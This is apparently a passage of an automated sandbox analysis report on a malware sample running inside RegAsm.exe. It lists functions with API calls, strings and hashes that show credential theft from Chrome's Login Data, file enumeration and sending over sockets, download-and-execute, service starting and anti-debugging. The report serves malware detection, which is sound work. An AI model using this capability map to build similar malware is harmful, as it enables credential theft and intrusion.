                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                    • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                    Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                    • GetLastError.KERNEL32 ref: 0041799D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                    Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 00409258
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                    • FindClose.KERNEL32(00000000), ref: 004093C1
                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                    • FindClose.KERNEL32(00000000), ref: 004095B9
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                    • String ID:
                    • API String ID: 1824512719-0
                    • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                    • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                    Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID:
                    • API String ID: 276877138-0
                    • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                    • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                    Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceA.KERNEL32 ref: 0041B4B9
                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                    Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 0040966A
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNext
                    • String ID:
                    • API String ID: 1157919129-0
                    • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                    • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                    Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 00408811
                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    • String ID:
                    • API String ID: 1771804793-0
                    • Opcode ID: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                    • Opcode Fuzzy Hash: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                    Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                    • API String ID: 2825088817-3056885514
                    • Opcode ID: d5b821e171253cb396676c05401a8d63c0a5d85931093b1fd4d20512fa7d7d3c
                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                    • Opcode Fuzzy Hash: d5b821e171253cb396676c05401a8d63c0a5d85931093b1fd4d20512fa7d7d3c
                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                    Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID: XPG$XPG
                    • API String ID: 4113138495-1962359302
                    • Opcode ID: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                    • Opcode Fuzzy Hash: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                    Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                    • String ID: sJD
                    • API String ID: 1661935332-3536923933
                    • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                    • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                    Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                    • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                    Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                    Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                    • ExitProcess.KERNEL32 ref: 004432EF
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                    Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseDataOpen
                    • String ID:
                    • API String ID: 2058664381-0
                    • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                    • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                    Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                    • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                    • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                    • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                    Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    • API String ID: 1084509184-3316369744
                    • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                    • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                    Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    • API String ID: 1084509184-3316369744
                    • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                    • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                    Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                    • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                    Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                    • HeapFree.KERNEL32(00000000), ref: 004120EE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcess
                    • String ID:
                    • API String ID: 3859560861-0
                    • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                    • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                    Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                    Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                    Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
